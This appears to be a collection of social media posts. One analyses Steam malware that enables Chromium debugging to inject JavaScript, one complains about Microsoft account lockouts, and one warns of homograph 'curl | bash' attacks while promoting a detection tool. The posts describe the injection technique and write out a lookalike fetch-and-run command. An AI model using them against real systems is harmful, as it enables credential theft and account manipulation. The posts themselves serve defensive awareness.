Loshana Aloka

I learned quite a bit from this actually. I didn't know Steam was a Chromium app. Hence, you can kill Steam then relaunch it with the "-cef-enable-debugging" flag. Once you'll launched Steam with this, you can inject Javascript into Steam using Chromium "webSocketDebuggingUrl" stuff. This malware has a whole pseudo-framework of Javascript that can do: - Alert Bell (?) - Block pages - "Help page" (?) - Inventory manipulation - Steam library manipulation - Profile manipulation - Steam redirections Basically, this malware payload switches Steam into a Chromium debug state, then sends web debug requests (kind of like Chrome Dev Tools?) to manipulate the Steam pages. It injects Javascript. The chat window that spawns is from a remote host they control. This is really cool. Is it AI slop? Yes Is this code EXTREMELY easy to reverse engineer? Yes Did they unironically document their entire code base in Russian because it was (probably) written using Claude and the authors probably speak Russian? Yes Is this extremely creative and cool? Yes Special thanks to "pro" from 2c44. He handed me the payload and the decompiled Python. The malware .py was Base64 encoded ... so obtaining the original source was ridiculously easy.

I love this I don't say it because I'm somehow anti-ai, I say this because it's destructive for your life. You're going to have disrupted sleep, you're going to have disrupted relationships, your whole life will be lived between thinking of the next prompt and results of the current one. This ain't it king

Microsoft locked out OSR?! Holy FUCKING shit. I thought VeraCrypt and WireGuard was bad. Dawg, someone at Microsoft is fucking up BAD. This is ridiculous. The initial excuse was people didn't verify their email, so it was plausible like, "oh two people probably made a small mistake, bureaucracy, dumb stuff, weird coincidence". But then Windscribe... AND OSR?! What the fuck is going on at Microsoft? There is a galactic level of fuck up happening somewhere

Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. https://t.co/tIb4xThUn5